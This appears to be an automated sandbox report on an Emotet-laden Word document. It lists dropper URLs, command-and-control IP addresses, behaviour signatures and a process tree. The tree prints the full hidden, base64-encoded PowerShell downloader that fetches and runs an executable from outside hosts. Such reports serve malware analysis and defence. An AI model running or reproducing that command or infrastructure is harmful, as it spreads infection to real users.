Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    106s
  • resource
    win7v191014
  • submitted
    09-12-2019 16:58

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_b147ef181809997d173ebc4242d4a74d.29.doc

  • Sample

    191209-wxrwqh1wjs

  • SHA256

    23419c0a7cc778b60899d25977c95f7291915539f5f9bb85c5ce3bfe11c77e9b

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.aitb66.com/wp-admin/wdm12182/
exe.dropper

http://zisoft.zinad.net/wp-content/7flgzi080/
exe.dropper

http://ausflugemarrakesh.com/cgi-bin/512/
exe.dropper

http://axis-gps.com/pzdjz/hgpu56/
exe.dropper

https://xploremotions.com/rtrx/c656/

Extracted

Family

emotet

C2

76.221.133.146:80

104.33.129.244:80

172.90.70.168:8080

96.126.121.64:443

104.236.137.72:8080

172.104.233.225:8080

85.234.143.94:8080

50.28.51.143:8080

190.186.164.23:80

47.146.42.234:80

63.246.252.234:80

80.29.54.20:80

68.183.190.199:8080

46.28.111.142:7080

183.82.97.25:80

87.106.46.107:8080

188.216.24.204:80

186.68.48.204:443

181.198.203.45:443

88.250.223.190:8080
rsa_pubkey.plain

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Drops file in System32 directory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Modifies registry class 136 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_b147ef181809997d173ebc4242d4a74d.29.doc"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:1908
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABSAGIAcgBtAHcAbABxAHkAaAByAD0AJwBSAHEAZAB6AHEAcgBtAHQAcwB4ACcAOwAkAE8AZABrAHUAZwBtAHIAagBnAGIAIAA9ACAAJwAzADcANwAnADsAJABOAHgAbABrAGMAZQBiAGYAYgBhAHoAPQAnAEQAbAByAGgAYwB3AHQAYQBjAHAAJwA7ACQARAB1AGsAcgBhAHkAeQBhAHgAaAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBkAGsAdQBnAG0AcgBqAGcAYgArACcALgBlAHgAZQAnADsAJABUAHAAcAB2AHEAdQByAHAAegBqAG8AZQA9ACcATgBpAGYAcABwAGQAcgBlAG8AJwA7ACQAUQBwAHkAeQBsAHEAaAB6AHoAdgBrAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAEUAVAAuAFcARQBCAGMAbABpAGUATgB0ADsAJABPAHoAdQBkAG4AZQBjAGkAZQB5AG8APQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBhAGkAdABiADYANgAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AdwBkAG0AMQAyADEAOAAyAC8AKgBoAHQAdABwADoALwAvAHoAaQBzAG8AZgB0AC4AegBpAG4AYQBkAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANwBmAGwAZwB6AGkAMAA4ADAALwAqAGgAdAB0AHAAOgAvAC8AYQB1AHMAZgBsAHUAZwBlAG0AYQByAHIAYQBrAGUAcwBoAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ANQAxADIALwAqAGgAdAB0AHAAOgAvAC8AYQB4AGkAcwAtAGcAcABzAC4AYwBvAG0ALwBwAHoAZABqAHoALwBoAGcAcAB1ADUANgAvACoAaAB0AHQAcABzADoALwAvAHgAcABsAG8AcgBlAG0AbwB0AGkAbwBuAHMALgBjAG8AbQAvAHIAdAByAHgALwBjADYANQA2AC8AJwAuACIAUwBgAHAATABpAHQAIgAoACcAKgAnACkAOwAkAEsAdQBuAGkAbgBrAGgAYwA9ACcAUABtAGsAbABmAGgAcwBtAHQAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgB5AGgAeQBlAHgAaABkAHgAYgAgAGkAbgAgACQATwB6AHUAZABuAGUAYwBpAGUAeQBvACkAewB0AHIAeQB7ACQAUQBwAHkAeQBsAHEAaAB6AHoAdgBrAC4AIgBkAE8AdwBuAEwAYABPAGAAQQBkAEYAaQBMAGUAIgAoACQAQgB5AGgAeQBlAHgAaABkAHgAYgAsACAAJABEAHUAawByAGEAeQB5AGEAeABoACkAOwAkAFgAagBsAHYAbQBhAGYAYQBwAGIAcABzAD0AJwBFAGcAbQB6AGgAYwB3AHcAeAB2AHUAZQBqACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQARAB1AGsAcgBhAHkAeQBhAHgAaAApAC4AIgBsAGUATgBgAGcAdABoACIAIAAtAGcAZQAgADMANgA5ADEAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAFIAVAAiACgAJABEAHUAawByAGEAeQB5AGEAeABoACkAOwAkAFUAZABwAHIAeABkAHgAcwB4AGgAdwBzAD0AJwBYAHIAZgBnAGQAbABhAHUAcABrAHgAJwA7AGIAcgBlAGEAawA7ACQAUABhAGkAcQBqAGEAeABnAGwAYwA9ACcAQQBqAHUAYgBhAGYAZABjACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAegBkAHMAbwByAHoAbwBmAHQAdwBzAGkAPQAnAFEAbgByAHcAaABsAG8AcQBkAGMAYgAnAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:848
    • C:\Users\Admin\377.exe
      "C:\Users\Admin\377.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:564
      • C:\Users\Admin\377.exe
        --11945cd1
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:528
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "170567490699066284820195978591905946548-1324181297-6827939461883015892416655494"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1968
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
      PID:1324
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
        PID:1648
      • C:\Windows\SysWOW64\componboost.exe
        "C:\Windows\SysWOW64\componboost.exe"
        1⤵
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        • Executes dropped EXE
        PID:1560
        • C:\Windows\SysWOW64\componboost.exe
          --30000dcb
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: EmotetMutantsSpam
          • Drops file in System32 directory
          • Suspicious use of SetWindowsHookEx
          • Executes dropped EXE
          PID:1096

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\377.exe
        Download Submit

      • C:\Users\Admin\377.exe
        Download Submit

      • C:\Users\Admin\377.exe
        Download Submit

      • C:\Windows\SysWOW64\componboost.exe
        Download Submit

      • C:\Windows\SysWOW64\componboost.exe
        Download Submit

      • memory/528-11-0x0000000000400000-0x00000000004A2000-memory.dmp

        Filesize

        648KB

        Download

      • memory/528-10-0x0000000000260000-0x0000000000277000-memory.dmp

        Filesize

        92KB

        Download

      • memory/564-8-0x00000000003A0000-0x00000000003B7000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1096-16-0x0000000000400000-0x00000000004A2000-memory.dmp

        Filesize

        648KB

        Download

      • memory/1560-13-0x0000000000330000-0x0000000000347000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1908-0-0x0000000006220000-0x0000000006224000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1908-5-0x0000000006346000-0x000000000634A000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1908-4-0x0000000006320000-0x0000000006346000-memory.dmp

        Filesize

        152KB

        Download

      • memory/1908-3-0x0000000008E60000-0x0000000008E64000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1908-2-0x00000000063AC000-0x00000000063AE000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1908-1-0x00000000063C9000-0x00000000063CC000-memory.dmp

        Filesize

        12KB

        Download